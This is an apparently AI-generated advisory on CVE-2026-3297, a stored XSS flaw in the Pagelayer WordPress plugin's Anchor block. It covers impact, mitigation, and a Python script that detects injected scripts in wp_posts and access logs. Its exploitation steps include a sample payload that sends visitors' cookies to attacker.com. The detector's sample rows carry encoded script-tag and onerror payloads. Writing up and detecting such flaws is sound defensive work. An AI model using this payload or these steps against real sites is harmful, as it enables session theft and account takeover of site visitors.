CVE-2026-3297
WordPress Vulnerability Analysis and Mitigation

Overview

CVE-2026-3297 is a Stored Cross-Site Scripting (XSS) vulnerability in the Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress. It affects versions up to and including 2.0.9, where insufficient input sanitization and output escaping in the Anchor block allow authenticated attackers with contributor-level access or above to inject arbitrary web scripts into pages. The vulnerability was published on June 13, 2026, and assigned by Wordfence. It carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-site Scripting). The vulnerability exists in the Anchor block component of the Pagelayer plugin, which fails to properly sanitize user-supplied input before storing it and fails to escape it upon output rendering. An authenticated attacker with at minimum contributor-level WordPress access can craft a malicious payload within the Anchor block that is persistently stored in the database and subsequently executed in the browsers of any user who visits the affected page. No user interaction beyond page visitation is required for the payload to trigger (GitHub Advisory, Wordfence).

Impact

Successful exploitation allows injected JavaScript to execute in the browsers of all users who visit the compromised page, including administrators. This enables session cookie theft, account takeover, unauthorized actions performed on behalf of victims, and redirection to malicious external sites. The scope is marked as "Changed" in the CVSS scoring, reflecting that the impact extends beyond the attacker's own session to affect all site visitors. Availability is not directly impacted, but confidentiality and integrity are both at risk (GitHub Advisory, Wordfence).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Pagelayer plugin version ≤ 2.0.9 using tools like WPScan or by inspecting plugin metadata in publicly accessible WordPress installations.
  2. Obtain contributor access: Register or compromise a WordPress account with at least contributor-level privileges on the target site.
  3. Navigate to page editor: Log in and create or edit a page using the Pagelayer drag-and-drop builder.
  4. Inject payload via Anchor block: Insert a malicious JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the Anchor block field, which lacks proper input sanitization.
  5. Publish or save the page: Submit the page, causing the malicious script to be stored persistently in the WordPress database.
  6. Trigger execution: Any user (including administrators) who visits the affected page will have the injected script execute in their browser, enabling session hijacking, credential theft, or further malicious actions (GitHub Advisory, Wordfence).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to page editing endpoints (e.g., /wp-admin/post.php or REST API endpoints) from contributor-level accounts containing suspicious script tags or encoded JavaScript in the request body.
  • Database: Unexpected <script> tags, JavaScript event handlers (e.g., onerror, onload), or encoded payloads stored in the wp_posts table within Pagelayer Anchor block content fields.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages built with Pagelayer, potentially carrying cookie or session data in query parameters.
  • File System: No direct file system artifacts expected for stored XSS; however, monitor for any newly created or modified PHP files in the Pagelayer plugin directory (/wp-content/plugins/pagelayer/) that could indicate secondary compromise.
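The database and log indicators above can be turned into a repeatable check. The following is an added example for defenders, not code from the original advisory or from the Pagelayer project: it normalizes HTML-entity and percent encoding (so encoded payloads match), looks for script tags, inline event handlers and javascript: URLs in rows shaped like wp_posts, and flags POSTs to the page-editing endpoints named above when the request URL carries the same indicators. The `[pl_anchor ...]` shortcode name in the sample rows, the sample post rows and the access-log lines are all constructed for the example; standard access logs do not contain request bodies, so body inspection needs a WAF or audit log.

```python
"""Detection heuristics for the CVE-2026-3297 indicators of compromise.

Added example for defenders; not part of the Wiz advisory or the Pagelayer
plugin. Sample data below is constructed. Tune the patterns before relying
on them in production, as they are deliberately broad.
"""
from __future__ import annotations

import html
import re
import urllib.parse

# Page-editing endpoints from the IoC list (classic editor and REST API).
EDIT_ENDPOINTS = ("/wp-admin/post.php", "/wp-json/wp/v2/pages", "/wp-json/wp/v2/posts")

# Indicator patterns applied after encoding normalization.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon(?:error|load|click|mouseover|focus|toggle)\s*=", re.I),
    "javascript_url": re.compile(r"javascript\s*:", re.I),
}

# Apache/nginx combined log format: client, timestamp, request line, status.
LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(text: str, rounds: int = 3) -> str:
    """Undo percent and HTML-entity encoding a few times so that encoded or
    double-encoded payloads (%3Cscript%3E, &lt;script&gt;) become matchable."""
    for _ in range(rounds):
        decoded = html.unescape(urllib.parse.unquote(text))
        if decoded == text:
            break
        text = decoded
    return text


def find_indicators(text: str) -> list[str]:
    """Return the names of the indicator patterns present in the text."""
    norm = normalize(text)
    return [name for name, rx in INDICATORS.items() if rx.search(norm)]


def scan_posts(rows: list[dict]) -> list[dict]:
    """rows mimic `SELECT ID, post_author, post_content FROM wp_posts`."""
    findings = []
    for row in rows:
        hits = find_indicators(row["post_content"])
        if hits:
            findings.append({"post_id": row["ID"], "author": row["post_author"], "indicators": hits})
    return findings


def scan_access_log(lines: list[str]) -> list[dict]:
    """Flag POSTs to editing endpoints whose path or query string carries an
    indicator. Bodies are absent from access logs; pair with a WAF/audit log."""
    findings = []
    for line in lines:
        m = LOG_RX.match(line)
        if not m or m["method"] != "POST" or not m["path"].startswith(EDIT_ENDPOINTS):
            continue
        hits = find_indicators(m["path"])
        if hits:
            findings.append({"ip": m["ip"], "path": m["path"].split("?")[0], "indicators": hits})
    return findings


# Constructed sample rows; "[pl_anchor ...]" is a placeholder shortcode name,
# not necessarily the plugin's real one.
SAMPLE_POSTS = [
    {"ID": 41, "post_author": 7, "post_content": '[pl_anchor id="top" title="Overview"]'},
    {"ID": 42, "post_author": 7, "post_content": '[pl_anchor id="x" title="&lt;script&gt;alert(1)&lt;/script&gt;"]'},
    {"ID": 43, "post_author": 3, "post_content": '<img src="missing.png" onerror="alert(1)">'},
]

# Constructed sample access-log lines in combined format.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Jun/2026:10:01:02 +0000] "POST /wp-admin/post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [13/Jun/2026:10:02:10 +0000] "POST /wp-json/wp/v2/pages/42?content=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Jun/2026:10:03:00 +0000] "GET /sample-page/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_posts(SAMPLE_POSTS):
        print("wp_posts:", f)
    for f in scan_access_log(SAMPLE_LOG):
        print("access log:", f)
```

Against the sample data, posts 42 and 43 are flagged (encoded script tag and onerror handler respectively) and the one REST API POST with an encoded script in its query string is reported; the plain POST to post.php is not, because nothing in its URL is suspicious. A real run would feed `scan_posts` from a database export restricted to Pagelayer content and `scan_access_log` from the web server's logs.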

Mitigation and workarounds

Update the Pagelayer plugin to a version beyond 2.0.9 as soon as a patched release is available; the fix is referenced in the plugin changeset (Pagelayer Changeset). As an interim measure, restrict contributor-level and above access to only fully trusted users, and consider temporarily disabling the Pagelayer plugin on sensitive sites. Deploying a Web Application Firewall (WAF) with rules targeting script injection in page content fields can provide additional defense-in-depth (Wordfence, GitHub Advisory).

Community reactions

The vulnerability was assigned and disclosed by Wordfence, a leading WordPress security firm, as part of their threat intelligence program. Coverage has been picked up by standard vulnerability aggregators including VulnDB, Tenable, INCIBE, and ENISA's EUVD. No notable independent researcher commentary or significant social media discussion has been identified beyond automated CVE tracking posts.

Additional resources

This report was generated using AI.

Related WordPress vulnerabilities:

  CVE ID | Severity | Score | Component | CISA KEV exploit | Fixed | Published
  CVE-2026-5513 | HIGH | 7.2 | bookly-responsive-appointment-booking-tool | No | Yes | Jun 13, 2026
  CVE-2026-9629 | MEDIUM | 6.4 | canvas | No | Yes | Jun 13, 2026
  CVE-2026-3297 | MEDIUM | 6.4 | pagelayer | No | Yes | Jun 13, 2026
  CVE-2026-1291 | MEDIUM | 4.3 | meow-gallery | No | Yes | Jun 13, 2026
  CVE-2025-15546 | NONE | N/A | wp-file-upload | No | Yes | Jun 14, 2026
